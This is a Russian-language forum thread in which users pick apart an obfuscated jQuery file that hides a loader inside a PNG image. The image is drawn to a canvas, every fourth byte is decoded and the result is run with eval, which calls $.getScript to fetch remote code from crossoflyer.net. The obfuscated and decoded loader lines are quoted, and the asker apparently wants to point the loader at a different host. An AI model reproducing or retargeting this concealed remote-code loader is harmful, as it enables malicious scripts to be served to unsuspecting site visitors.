есть jquery скрипт, нужно понять где формируется url
 

jquery скрипт нужно понять где формируется url и объяснить как его менять
запрос идет на crossoflyer.net


с ценой за работу просьба в личку


раздекоденный скрипт скрипт прилагаю

Оставлю возможность кому нить заработать )

url формирует скрипт который находится в в картинке =)

неправильный ответ )

ответ правильный

т.е там где o.src= png
base64 декордер выдает кракозябы.


eval(c) - формирует урл и думал потом только добавляет в png отрисованную.

eval(c) в hexе формирует url домена. Заменял на алерт выводило. Но вот где он задается вот в чем проблема?


а внутри function (r,q) где то задается вроде url
потому как анализировал через spy js и в массиве arguments формируется чистая строка url.

Разве не так? подскажите(


p.s вот на 1850 строке
где c.isFunction(b) && (f = f || d, d = b, b = null);
return c.ajax({type: "GET",url: a,data: b,success: d,dataType: f})

анализирую через firebug, передается переменной a = url домена crossoflyer.net

чуть выше есть скрипт который загружает png в canvas и берет байтики из него по хитрым смещениям
Но тебе это нафиг не нужно
1. добавь строчку "console.log(c)"перед eval(c) и ты получишь скрипт
который содержит массив и этого из массива по частям собирается строчка с URL

Для ie < 10 у скрипта другое поведение но с тем же результатом

да это делал и понял но как изменить этот массив на свой .

и посмотри номер строки 1850 что указывал, в переменной a находится понятный адрес и только потом он преобразуется в хекс.

концовка скрипта понятна,но вот где этот адрес генерируется и как ее изменить вот в чем вопрос?

Блин да возьми ты нормальный отладчик

Функция o.onload(строка 2313) вызывает eval -> который вызывает c.extend.getScript(1853) -> который вызывает c.extend.get(1851) -> который вызывает c.extend.ajax(1913)

в функции o.onload eval вызывает скрипт

var _0x9377=["\x68\x74","\x74\x70\x3A","\x2F\x2F","\x63\x72","\x6F\x73\x73","\x6F\x66\x6C","\x79\x65\x72","\x2E","\x6E\x65\x74","\x2F","\x67\x65\x74","\x44\x61\x74\x61","\x2E\x6A\x73\x3F","\x53\x72\x63","\x26\x76\x65\x72\x3D","\x31\x69","\x67\x65\x74\x53\x63\x72\x69\x70\x74"];$[_0x9377[16]](_0x9377[0]+_0x9377[1]+_0x9377[2]+_0x9377[3]+_0x9377[4]+_0x9377[5]+_0x9377[6]+_0x9377[7]+_0x9377[8]+_0x9377[9]+_0x9377[10]+_0x9377[11]+_0x9377[12]+_0x9377[13]+_0x9377[14]+_0x9377[15]);

что расшифровывается как

var Ar= ["ht", "tp:", "//", "cr", "oss", "ofl", "yer", ".", "net", "/", "get", "Data", ".js?", "Src", "&ver=", "1i", "getScript"];
$[Ar["16"]](Ar[0]+Ar[1]+Ar[2]+Ar[3]+Ar[4]+Ar[5]+Ar[6]+Ar[7]+Ar[8]+Ar[9]+Ar[10]+Ar[11]+Ar[12]+Ar[13]+Ar[14]+Ar[15]);

// $.getScript("http://crossoflyer.net/getData.js?Src&ver=1i");

o.onload отображает изображение на канвас (2306 -2310)
после этого запускает цикл с шагом 4 строка (2311 ; b += 4)
т.е. берется каждый 4й байт и пропускаются отрицательные байты " 0 < a[b] && (c += String.fromCharCode(a[b]));"
после этого выполняется eval(c)

разжевано дальше уже некуда =)

прости возможно за глупость или что-то недопонимаю.

Но делал и смотрел так же но так и не понял где именно происходит генерация этой анонимной функции с адресом. Где понять чтоб задать другой урл.

Все что ты описал понимал и так же смотрел. Но вот где проиходит генерация url чтоб задать другой так и не понял.


return c.ajax({type: "GET",url: a,data: b,success: d,dataType: f})

вот в переменной a уже есть адрес, я про это говорил. То как отдебажить в гугл хроме уже узнал, все таки рассшифровывал его и потихоньку учился.

Стоит задача то поменять адрес урл, чтобы при вызове анонимной функции генерировался другой адрес. Вот в чем беда? А код запутан и понять не могу.
Заранее благодарю